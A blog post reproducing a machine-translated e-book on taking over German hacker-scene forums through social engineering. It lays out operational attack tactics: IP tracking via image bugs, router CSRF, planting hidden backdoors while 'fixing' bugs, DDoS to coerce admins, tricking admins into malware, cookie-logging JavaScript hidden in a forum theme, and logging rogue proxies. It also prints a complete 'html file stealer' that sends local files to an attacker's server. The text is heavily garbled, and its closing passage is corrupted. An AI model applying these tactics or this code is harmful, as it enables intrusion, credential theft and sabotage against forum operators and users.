Home > generally > Tactics for taking over German Scene boards

Tactics for taking over German Scene boards

May 22nd, 2011 Leave a comment Go to comments

###############################################
##### Tactics for taking over German Scene boards #####
################# E-book by unnex ###################
###############################################


Content:

Preface

1. Basic Information
1.1 Software
2.1 Team Analysis
1.3 User Names & IP’s
4.1 Trust, Fame, Resources & Contacts

2. Preparation
2.1 IP’s get
2.2 Bugs Search
2.3 faming
2.4 Board’s interests
2.5 Contacts tie

3. Offensive tactics
3.1 of a friend in need
3.1.1 bug fix
3.1.2 Botnet crash o.
3.1.3 malware
3.1.4 Modding
2.3 offers & search
3.2.1 great tool
3.2.2 tutorial as an html file
3.2.3 nolog my logs,
3.3 My Projects
3.3.1 my crew

Preface:

This e-book describes methods of cracking of the German hacker scene boards.
It describes methods and procedures as well as important information to the hacking of a Scene boards make it possible. The following is a description and information attack are Taktitken were used by me frequently successful. This e-book only considers social engineering attacks.
Anyone who reads this e-book should be aware that it serves to educate the security vulnerabilities in German Scene Boards. And the consequences of an information source to address these vulnerabilities represents.
It is no Book of Dead to the scene. There is an e-book that the admins only disclose vulnerabilities should enable them to correct them and then observe. All of the described attack tactics are based on social engineering and are therefore very varied applications.

1. Basic Information

In the next subsections Scene basic information about boards and their structure and the team members and their properties are described.

1.1 Software

As the name suggests, are “Scene boards” of forum software. In this case, one could assume that they will be programmed himself. But this is not the case. I’ve never seen a scene seen the Board itself has been programmed, and will probably never get one-to-face. Consequently, here, without exception, more or less known, already existent forum systems, used. eg in the German language is very often on smf, vbulletin, wbb, phpbb, and taken mybb zurrück. In China at present “Discuz” the big hit, etc. ..
In this e-book but I would like to be confined to the German scene. Not only the forum systems themselves but also the associated mods and addons are in only the rarest of cases or be fairly self-programmed.

Accordingly, one can therefore assume that the administrators and team members of the board very little idea about the source of their forum software have.
To explain this state with lack of programming skills of the German underground.

These facts now appear unlikely at first glance. but quite the opposite and are part of the ways to hack a Scene boards.
But more on that later.

2.1 Team Analysis

In recent years, has received the amount of cards in the scene a huge increase. What has resulted are the real hackers and programmers usually only the people who are already on the scrap heap.

This leads us again to a different fact. The scene consists mostly of young children and half. Thus, it is very unlikely that a board of qualified
and experienced administrators will be conducted. Contributors to this fact is that many get out of the old hands sooner or later from the scene or just White’s has to be.
What is most frightening, not least low average age and the associated behaviors of Scene’ler.

So if you want a Scene ownen board, it is important for the time being the team to take a close look. In most cases you will encounter young men without any programming knowledge.
If that is the case then it is important to recognize the individuals and their properties and ranks in the team. Zb. Who is the coder? Who is the gfx’er? Who are all the specifications
normal mods. etc. ..

1.3 User Names & IP’s

In the Underground it is almost a national sport has become more than one user name to own. Many scene members therefore constantly change or be specific to different projects their username. So now you should know the username of an admin, so it is important not see this as a dogma of their Internet identity. Things like MSN Messenger, e-mail addresses, signatures … can help other users to find out the persons concerned. It should be noted to which a Scene’ler never or almost never, is registered only on one board.

Another popular sport is the permanent anonymous surfing. i.e. many use vpn’s or sock’s permanent, or at least whenever they’re on their Board. What we as an attacker of course not meets. Therefore, it is important to never rely on the IP address of the victim. Even if that is excellent as dynamiche IP. For here also it is possible that the one who has a private computer infected and now uses as its link socks (VicSock). So you should spy on the IP of the victim always use methods with which one can be as sure you get his real IP.

4.1 Trust, Fame, Resources & Contacts

As mentioned earlier, most of the scene is not very well versed what the hacking, and specifically older and less common hacking methods are concerned. In many cases, so it’s pretty easy to impress these people or to convince them of your ability.
Zb. Tells you what a session fixation, or a tpl-inject or an array function escalation?
Whether you like it now has or not, I can assure you in the scene know only to the least no one at all. Such knowledge is very important to you. So you can show how much you show that you and the more points than others. And this you can know to strengthen your role as a real hacker to use well.

—————————-

The fame in itself is also a good basis for a successful attack. Strangely, fame is often thanked with confidence. Your fame in the scene can therefore
become a powerful asset in attacks on scene-boards. However, fame also leads to many envious people who develop into real hatern not rare.
Basically, it’s no wonder when one considers the age of this “hater” and the scene in general. So now you should try using the admin of a board
fame to wrap it’s just necessary to make sure the admin of this is not a hater of fames begins as you go.

Another useful thing is the existence of the right contacts and resources. contacts and resources with my contact to the board admins and the scene itself
and the owners of some of servers to host or socks to the nozzles. Similarly, to know something in the crash of servers, or possibly a small botnet your call its own.

2. Preparation

At this point, I will describe how to get any useful information obtained for the various attack tactics are helpful or even necessary.

2.1 obtain Ip’s

As I said the forum systems uses the scene and drag it and upload aufmodden at will.
Everyone who has little experience in hacking can only imagine now how easy a spy attack on the ip, one thing users. This forum systems allow graphics from remote server to bind. So now it uses the principle of Web bugs (tracking pixel problems), it’s a breeze to determine the ip to the opposite.
We load a graphic up on one of our servers and hang them on our forum as a signature or send the message with bbcode at a private.
Then we see here in the server logs and look for us out when our graphic ip which has called.
This method works well for many MSN Messenger including 7th Alternative to this method can also help the victim put it on a link and then click to let there the ip per server logs or log in for example php. another possibility would be eg. give him a sock on.
When he then tried the sock on mice, we can all mitloggen neatly ip incl.

These methods are of course not the only ones. as anyone can imagine there are tens of methods in order to get ip or the proxy ip to the victim. Now there is so much the scene user permanently sitting behind a proxy or similar.
Here are recommended practices for which one can be as sure of getting the correct ip. one possibility would be eg. an attack on the router of the victim. of course you can not directly attack most of the router over the internet. and not because wireless is not looking where he is.
Likewise, the wireless router very well encrypted. An attack via the Internet on the router of the victim has so absurd.

But just because this attack is interesting for us. No one would expect the attacker from the Internet and not infect the victims computer without the router and accessible from the Internet, the router is in a position to attack.
This fact leads to all the attacks coming from outside must be prevented now quite good. However, while the Internet is neglected. Many users feel with their macfiltern and WPA2 keys provided so sure she does not remember a decent router to set password. Most routers have splashing around so the default login data and selected as authentication. we can then log into the router via CSRF or our sacrifice will do it for us unconsciously. It is of course important as many species in our router to bind a script. Therefore, the sacrifice now so connected via router csrf in which we could over a xss bug in the router, provide all the info to the router. as incredible as it sounds. But many, many router firmware have xss bugs, some of which are even available no matter whether someone is logged in or not. Likewise, it is often before the one when logged in via the router, etc. or can merely reset csrf link

2.2 Bugs Search

No, I am referring not SQLI’s or rfi, tpli etc. .. if we find something we need not trouble us to make this more text here to read more ^ ^ I mean bugs where you are sacrificing more or less involve in this discussion. So, for example. XSS, CSRF, session fixation, clickjacking … However, I describe the use of this bugs not in the traditional sense. We use the bugs not from (in the sense why they are bugs at all). but we use it as means to our apparent willingness to offer. But more in the description of each attack tactics.

The find such bugs is on the forum systems are often very simple. There are even very often treat already bug reports from the current forum systems such bugs. For example, a gap in the middle of 2010, xss enter a homepage in the profile represent the same system have been on several forums. Including vbulletin, smf, phpbb. at wbb3.0.x there was also a xss vulnerability in the user profile. Currently wbb3.1.3 would be the latest version. also it contains a session fixation that can be coupled with CSRF. For example clickjacking are currently almost all forum systems vulnerable. You notice so the find such bugs is very likely, this probability increases often continuously with the number of mods which has held the board.

2.3 faming

As mentioned above may be of great use his fame to win the trust of the board admins. Do we have a couple of news in popular IT magazines or blogs or similar things, then we are frequently very quickly met with respect and trust. especially in conjunction with item 2.2 of this special trust is helpful. because here we have to trust the one hand and on the other hand, technical know ascribed. If we do so an admin a bug report we have very high chances to be associated with the fixed the bug itself. And this can contribute even be the key to the server access.
Similarly, it simplifies the foist malicious software or harmful links. With the pretext of a particularly good side or to exploit a particularly good pass hacker tool do we have here are pretty good chances.

This fame can of course also “impressive” did obtain on the board. For example, we write some very useful tuts and they post to the board or give some useful accounts, etc. .. as we could a few contacts (leading to the admin) to use to make the admin of our fairy tales to make “super” skills.

2.4 Board’s interests

Target the interests of the board is also to take advantage of a useful tactic. For now you should determine what is missing from the board. or what the users need. zb
it loads a trojan disguised as a highly exploitable software in the hope of the admin pulls it up and become infected with it. or knowing that the admin, or
team members need socks.
If they do fall into these two aspects of spectrum. Firstly, we now know they are not anonymous on the board away and has an easy time
at 2.1

Second, it gives them a socks you own and manage the user logged in with their negotiations. It also of logging into the admin panel of the forums. In the scene anyway, no one knows how precarious socks5 encryption really is!

Or we learn that the board need a new design. to do one + playing with javascript, leaving in them a few XSS bugs. The give us carte blanche, of course, at 2.2
would.

Or the Admin must umhosten because he can no longer pay the server. If it pushes him to let him host with you … So there are many interested can be exploited versatile.

2.5 Contacts tie

Acquiring the right contacts can be of great use to eg. to consolidate his authority or credibility. It is important, gone on to whatever a
To get to the admin contact. If we eg. Contact us to get a team member then we could use this to make us a name in the Admin.

3. Offensive tactics

All the things mentioned so far are important to this point and serve as the foundation for the subsequent attack tactics.

3.1 of a friend in need

In this case forcefully aware of situations in which one can offer his help or the admin is the admin asked.

3.1.1 bug fix

In this method, it is important to correct bugs fame and the right to bring a.
The first thing we look for the fame. For this purpose, we take a hacker to the scene in some news was mentioned. This identity, we now assume. We should be possible to the admin of the boards have no contact to respect this fame-person and that person has no contact information on the network provides.
So if possible take someone who is found only with a user name in the news. Now we are looking at the board prior to our identity and our idea of ​​bringing in a thread our news and messages we hang a few notable programmer skills.

Then we wait for the first time as a little bit and see how the members respond to our imagination. Circular wait a day and clean look. In most cases we are sincerely welcomed and are immediately bombarded with newbie questions over and chop tutanfragen. Request that we go as fast as possible in order to consolidate our status as a really good hacker.
If the Getah we are looking for a bug in the forum. So as already described in “2.2 looking bugs.
This bug reporter, we admin or coder of the boards. When reporter, it is very important to bring much fachchinesich with one and the bug as complicated as possible to represent and to write to him far-reaching impacts. It is also important to make the bug is the Sun as it looks like it could be fixed only with difficulty. Then we wait for the reaction of the opposite now and see if he knows what is tuhen to or not. If he does not, we offer him promptly to our aid. If he knows what to tuhen. Do we need to bring in as soon as possible counter-argument for his ideas. So for example if we did report offers an xss bug and he was my way is just ‘or’ we will respond ausdeclarieren him this is not sufficient since one example with some luck, this character-character-with unknown which one is in front can enforce.
Or that uses the function to which one ausdeclarieren yes another array function escalation could make it possible so we made it to the admin looking to make that fixed the bugs is not as easy as he thinks it is at the time of your help to offer. At its best it still says that her already a few times have done and know what to look you need. and determined to go quite quickly the bug is fixed too.
Mun raises the question: how far can you get involved in the fixed bugs? At this point I would like to describe a few possible variations.

-He will be granted access server so that you can fix the bug. now it’s clear what you do. it fixed the bug and also builds a little backdoor into the source. it respects the backdoor as the source hidden deep in and out for example. line is around 2-3 and variable names are adapted to other possible variable source. -It gets the data source file and sent shall you give him now fixed so that he can upload them yourself. again it fixes the bug is building up a backdoor.

-He gives you remote access to his computer and wants to see how it fixes the code. can be a risky maneuver, but it is quite feasible. you may take one to fix the code is as long as possible. loss is best so long that no one would have to investigate again. These copies then in her into his phpdatei. fix code in your course, you have again a little backdoor installed. It can not hurt the code over the whole file to share on the fixed and in which the admin is watching very quickly go from Amsterdam to leave. so the admin is already at uebefordert see clearly.

should occur the rare instance, and your sacrifices fixed the bug itself, it’s important to find a new one. or by the above arguments against you on its work to be fixed. in the works make the most of it well and you can prove that he can not bug fixed itself. In this case I have most probably one of the three aforementioned options to choose. you have done it then the source abckdoor under your cheer, then you just have to wait until no one from the team on the board is online. therefore possible in the middle of the night. then you can quietly take over your backdoor and use the server.

3.1.2 botnet crash o.

In this method, we rely on our resources especially. it is even without, and how it is without, I describe it. but remember you get, the method without resources is likely to be less successful. for the time being as it is without resources:

We will get back to the patient to forum and introduce ourselves. know this we note that we have a very good and secure a lot of experience in servers against DDoS and other attacks have. if we have said, the first member “hello” and we were fairly taken to the knowledge, can already go off. we look for a bug in the server software
and the server crash. So a DoS bug or memory corruption, etc. .. we succeed, then we find a bug, then we put the board vortan lame every time team member or the admin themselves online. it is only a few days or one probably. only take hours to board the operators of this state is properly on the nerves. consequently, they will try something against the problem going. now there are several possibilities. addresses the fact this team has bugs then layer in the slot for this method. If you can not fix then they are logically dependent on aid. if you’re lucky get the admins because of your own imagination threads for you. should not be the case, then is asked to act fast now. we contact the admin and tell him our sorry about the condition of the boards with him and suggest the secure server. our imagination thread we mention the possibility to add a bit of credibility to bring into play. the admin will give us the time being no trust. So we continue to crash his server. but this time non-stop as soon as we receive the response from the admin have expressed that he does not accept our help. if we believe that we are his hands enough to write, we then went at him again and offer him an immediate solution. So we offer him a script to which a server contains backdoor. to the admin to continue to wrap you we note that we really like on this board are traveling and want to do everything possible to get it back online. In addition, we ask them to try it at least once for a short time. and if it does not work so he can cut down again. Maybe it will take this time to our offer. Now we just have to wait a short time, eg. an hour, and then we stop our attack on the board. what is happening now clear. we write to the admin and belatschern him permanently, but how great it is that the script works. This action would give us time or the admin deal with us so that we can exploit the same time our backdoor before the admin script possibly again extinguished. should accept this proposal are not the admin and use our script we do not give him a tip attached to the server settings that is. So for example ausschlaten logs, with the ludicrous to the reasoning, the process prevents the logger with it and thus the script less and can be added to tuhen ueberastet less fast, etc. .. sooner or later he will try something similar to what we propose to him. if that happens then we stop our attacks crash and hear the thanks of the admins, which has helped our tip. Now we are waiting for quite a while. a week. then we fall back on. and again we offer our help. but this time with the reason the attack in which more must be done. we have the admin helped before. this time it will take our server script probably. and if he does that then we have to take over it, as I said, done and can use the server.

now to proceed as with resources. of course it may happen that one the affected server may not be as simple or Crashn cans. in this case we have with non-obstructive-off products ran. eg. a real big botnet. we lay the first board for a few days or hours lame. then we write to the admin and ask if he wants to have a better server. one we would sponsor. basically, it is usually only a matter of time. So we ddosn so long until the admin receives offer to us. he should switch to another server which does not belong to us, then we also ddosn this server. So when the time comes and he accepts our proposal then we have to do anything more than to wait until he treudoof can see his backups and data upload to our server where we will rest in all. is important in this method of course we emphasize in our imagination in the forum in which we are holding a damn good server.

3.1.3 malware

This method requires more skill because it is from here needs to play multiple roles that must be matched very well together. Furthermore, this method is quite lengthy. at first we lay a couple of accounts on its board of. then we can get us the ip of the admins. Then we investigate a bit. we need a few user names or other Internet address where the admin is logged on. if we have as much information about this person then we write to him. we do short-tempered and easily irritated. So we write it like this here: du: na, AKA xxx xxxx xxxxx and AKA. I got your ip 000.00.00.0! and will get the cops (important is that we really have his real ip.) the admin will try to not let it leave, and to make a thick hose and it did not apparently interested. at this point we show him that he supposedly a trojan on his system we have. we do that by ddosn his ip. We now wait until he comes back online. when he gets back, we tell him the following:
du: na nochma should I do? scan your system once you noob. days but no matter, come in about 8 cops Having said that we simply disappear without further words.
Now we give the admin a few days time. after 1-2 days, we write it to our board of accounts. and tell him that we were hacked. each account should be given individually
be right on rummheulen he was lifted up by the cops. it must be used at least one account to the admin info to snatch the one we already know. we have to get him to which he tells us he was written down by the attackers. Now the admin should be slow and he is anxious to ponder. we wait another day.
then we take one of our forum accounts and watch everyone should write in the forum and will see whether they are infected. with the other we write purely Accs
we are infected. we wait another day. then we write to the admin and tell him we found the trojan on our system and have a software with which you can have him tracking down. if we have worked well so far and the admin made enough fear he will accept our male ware, and we have trojanert him.

3.1.4 modding

here it is important to find the right interests of the boards. I received möglichekit on just one. So, should the need to design a new board: we will get back to the board and showing off our great designer skills. with imagination in the thread, we bring some 0815 designs one. However, the system is for another forum. then we write to the admin and all suggesting a design, a really good design for making his board. He will not reject this proposal. because a design so can not really hurt and he can finally say still no. the way we do our other forums and from accounts tell of them, not us like the old design. now it is time for our role as helpers to give a meaning. We ask the admin if it is possible that we once new design for gfxer or like to be appointed. the admin will take all this likely to happen only as a test case. So now we craft the design. and explain that we have made a big effort and even have javascript window treatments and for great effects in pure-placed. (Which should really be!) And now comes the crucial point. admin is not taking care of the javascript can be more dangerous than you think. So we give him screens from the local mode where we have the design going and persuade him to use it on his board. what the admin overlooks the danger is posed by our javascript code. because in this code we craft a cookie logger. best as hidden iframe. So, location.href + cookie and hide in iframe and NEN. that should be enough. when the admin of this design are now pops onto the forum the user permanent cookies on our server eubertragen. as incredible as it sounds. but at least no one looks up at all 100kb js files that are on one line, and find xss backdoors. This method is therefore also a very EFFECTIVE choice.

2.3 offers & search

these methods belong to bring the public of tools and other things into the board. So, we provide the forum for free tools and do it once.

3.2.1 great tool

to this method I do not need to say much. because it is already crowned abgedrochen and only rarely with success. We need some forum accounts and fud malware. these times, we offer software for free in the forum and explain to the other accounts such as this great program but funzt and how helpful it is. If we are lucky then the admin will try to use our male ware. and so we had him as a victim in our trojan list.

3.2.2 tutorial as html file

at Deiser method we use again the ignorance of the admins. At first we create a forum account and post a few normal txt. tutorials. if we have not posted enough of it and we see that these are also gels then we can only provide a tutorial purely as. html file is available. In this type of file no one will get suspicious. particularly
not the German scene’ler XD anticipate we need, however, a inforamtion important: where the server stores the sacrificing data? this we obtain the following way: we get the admin to us a remote desktop session a go. So for example Mikogo, TeamViewer, vnc … etc. reasons for this are many. we could for example, the handling can show a particular program or simply thrilled to ask if we are allowed to look at a hack, etc. We have found fundamental and connected to our victim then we memorize all the file we see very well. Most people have files like “serverdats.txt” or the like on the desktop. So, we pay attention to any file! if we see a file containing the server data we could have had enough information. So we see the example file “root.txt” on the desktop. than our sacrifice pressured to “start” in the taskbar, we have seen the user name that is listed in this example, with Windows program window. also: server.txt on the desktop and user name is “ichuser” would be to file path would be: C: \ Documents and Settings \ ichuser \ Desktop \ root.txt web:
file: / / / C: / Documents% 20and% 20Einstellungen/ichuser/Desktop/root.txt
in any case unless the user to c used. if not we would have to also get a point in our desktop session. Now we can create our tutorial. between a lot and so my
I hide a whole lot we have a text file stealer. I guess no one has Sogut as far from html file stealer too. So I take a code I had written once.
basically, it could even be the idea of ​​me XD this is looking but non schonmal whether anyone have guessed is XD

— Html file stealer by unnex —

######### ######### Sender.html

"><head>
<title> html stealer </ title>
<script type=”text/javascript”>
var first = “yes”;

function transfer (dat) {
if (browser type == “IE” & & first == “no” & & dat! = undefined) {
document.x.textausgabe.value + = “\ n”;
location.href = “http:// [server] / annahme.php log =” + escape (document.x.textausgabe.value);
}
if (dat! = undefined) {
document.x.textausgabe.value + = dat;

location.href = “http:// [server] / annahme.php log =” + escape (document.x.textausgabe.value);
first = “no”;
}
}

function read (file) {
var source = “”;
if (browser type! = “IE”) {
var url = new java.net.URL (new java.net.URL window.location.href (), file);
var stream = new java.io.DataInputStream (url.openStream ());
var line = “”;
while ((line = stream.readLine ())! = null) {
if (first == “yes”) {
source + = line;
first = “no”;
} Else {
source + = “\ n” + line;
}
}
Stream.Close ();
} Else {
source = dwn.startDownload (file transfer, the);
}
return source;
}
</ Script>
</ Head>

<body bgcolor=”white” text=”black” link=”blue” vlink=”purple” alink=”red”>
<script type=”text/javascript”>
var browser type;
if (navigator.language! | | document.defaultCharset) {
browser-type = ‘IE’;
document.write (‘none download’);
} Else {
browser-type = ‘MO’;
}
</ Script>
<form name=”x” action=”javascript:uebernahme(read(document.x.textfile.value))”>
<p> <input type=”text” name=”textfile” value=”file:///[local-file]” size=”20″>
<input type=”submit” name=”run” value=”Datei einlesen”> </ p>
<p> <textarea name=”textausgabe” rows=”5″ cols=”15″> </ textarea> </ p>
</ Form> <script> document.forms [0]. Submit () </ script>
</ Body>
</ Html>

######### ######### Annahme.php

<? Php
if (isset ($ _GET ["log"])) {echo $ _GET ["log"];
if (file_exists (“[logfile]“)) {
$ Filename = “[logfile]“;
$ Fp = fopen ($ filename, ‘a’);
fwrite ($ fp, “\ r \ n \ r \ n ########## ######### next file \ r \ n \ r \ n”. $ _GET ["log fclose ($ fp);} else {$ filename = “[logfile]“;
$ Fp = fopen ($ filename, ‘w’);
fwrite ($ fp, $ _GET ["log"]);
fclose ($ fp);}}
header (‘Location: [forwarding]‘);
?>

######### ######### Help.txt

# # # Html file stealer - by unnex # # #

help:

edit:

# Sender.html
[Server] = specify own server eg: www.meinserver.de
[Local-file] = locale eg to specify file-thieving: C: / geheim.txt

line 9: location.href = “? http:// [server] / save.php log =” + escape (document.x.textausgabe.value);
line 14: location.href = “? http:// [server] / save.php log =” + escape (document.x.textausgabe.value);
line 53: <p> <input type=”text” name=”textfile” value=”file:///[local-file]” size=”20″>

# Annahme.php

specify [logfile] = logfile where the stolen data is stored for example file: log.txt
[Next line] = where the victim is to be linked ultimately zb http://google.de

line 3: if (file_exists (“[logfile]“)) {
line 4: $ filename = “[logfile]“;
line 7: fclose ($ fp);} else {$ filename = “[logfile]“;
line 11: header (‘Location: [forwarding]‘);

the script is executed in local mode, then the transferred file from the vic.
important: send the file to your vic. oup not the file and send the link!

We must ensure this does not make the admin does not strike. because we know this is a method which is very rare and specific. could and so it is just too ridiculous an admin board of the German scene sufficient knowledge to recognize writing that he attacked them. as in “1.2 team analysis” is mentioned. added are coming. html files as safe anyway. However, we should hide the code very well. or we should be more stylish gadgets bring into the html file so that our code is not noticeable. or any unicode character as business spending. as it can not hurt if we are basically html file with a lot of code or unicode character (or any character as Unicode characters) zupflastern. we do not want to run the risk of the admin is doing in our reading text editor. finished our tutorial + file-stealer, we then board online. following we write to the admin and recommend him our tutorial. should he show no interest, then we can bring in necessary reasoning being that he should regard it is time to make improvements or error I can say. Now we just need to wait until he pulls our tutorial and it opens with its browser. The content is root.txt sent to our server that we have all the info we need to take on the servers. An advantage of this method is that our html file, logically, can be opened with any browser. Accordingly, our script is dependent only on the browser, the operating system therefore plays no role in this attack.

3.2.3 my nolog, log in.

The name of this point says it all. I guess it is easy to explain ^ ^ with this method are wiedermal our resource demand. first of all, we get the ip of the vpn or socks from the admin. how we do that we know from “get 2.1 IP’s”. then we will get back to the forum and create a thread in which we offer free nolog-socks. Now we wait a bit until we have rummgesprochen offer. we ddosn the sock down by admin. many use chopped server installed on which they have socks. mittelmäsigen with a botnet, we should thus, in most cases successful. Now there are two possibilities. either the admin, it is even one of your socks or we have to offer him a aufschwatzen. he should of course take one of you we have already won. otherwise: we write to the admin and tell him about a few servers that we have hacked and want to give him. or how to ask him whether he has a page for us hacks. So, we talk to him a few things that he asks one of its own accord after a sock. he should not ask and we will send him just one. whether he has asked for it or not. simply sock the login data + enter the admin. believe me people, in not eating the devil fly what the admin does not know with certainty is that, unlike him, we know that the socks5 encryption is far from perfect. as the sock is ours and we are under the thumb of the server, we can now freely log all actions of the admins. basically now only have to wait until the admin logs out about our sock in the acp boards.

3.3 My Projects

at this point should first be clear that I do not speak here of my projects persoehnliche but can use the various methods of how to chop their own projects to a German scene boards. So do not confuse with the dot-title. The basic rule for this species is attacked by “the admin used the same password everywhere Sogut as”.

3.3.1 my crew

In fact, the matter is quite simple. At first we need a forum system. At best a very well known what many use other scene-boards.
We then set to appoint NEN server and the scene-board. Now we tinker a bit to the login function so that all user + pw will be logged. Then we do a little advertising for it. if we have a few users together, let’s say 20, then we start a couple of unsuspecting non-scene to deface sites.
This provided us with advertising for our board. Then we post our deface on our board and on the board that we want to attack. We have moved a while so on to our board a little known degree in the heist of the other circuits reached boards.

Now it is time to sound the admin of the victim-a link partnership boards before. He will register with us must assess the situation can be. And here is the gentle song. If he moves, the password being logged and we can apply it to his board. If necessary, we can also suggest the admin a special title given to board in our example. “Link partner”, etc. ..

Afterword:

All methods described here were carried out by myself already successful. Of course, these tactics are not feasible 1to1, or they must logically be adapted to handle any situation.

Everyone who works with social engineering is anxious even after the attack to go undetected. However, one can sometimes have bad luck: D but just so I can bring in a reference for the times described Angriffstalktiken:

“3.1.1 bug fix”> http://scenewiki.wordpress.com/2010/04/18/cyberterrorists-defaced/

one probably. nor a word about this: this hack was more of a fault. or I would not deface the site may then I would not even be skins XD well this is admin “bursali” a type of all is ok. So it was rather unjustified from me to piss him so in the soup XD

This e-book may be reproduced without modi-fication in only informal. (The entire text, including this statement here, foreword & afterword)

This e-book is only for detection and the understanding and resolving security vulnerabilities in the German scene-boards.
I distance mic damage from any of this by e-can arise as book and all the readers pointed out that the information provided herein should not be criminal abuse.

greetz unnex

As mentioned above may be of great use his fame to win the trust of the board admins. Do we have some news in popular IT magazines or blogs or similar things then we are frequently very quickly met with respect and trust. particularly in connection with Section 2.2 of this special trust is helpful. because here we have a trust and on the other hand, attributed technischesssss know. if we now say a nominal admin a report we have a lot to fix hChancennnen Bugsssgs themselves to participate. and this may even be involved schlussendlichdlichServerzugriffgriffgriffff. It also simplifies the unteSchadsoftwaretwaretwarere or harmful linVorwandrwandrwandnd a particularly good side or to exploit a particularly good pass hacker tool do we have hierChancen.ute opportunities.

that fame can natürlichh üüüüüberruckende “did on the BoBoBoBoBoardn. For example, we write some very useful tuts and make them into some useful accoAcAcAccountsebenso boarBoBoBoardrschenken could we make a few kontKoKoKontaktpersonenm fuehrefüführenen admin to the admin ammenmärcAmmenmärchenren” super skills to make “.

 

Translatet with Google

Categories: generally Tags:
  1. No comments yet.
  1. No trackbacks yet.
*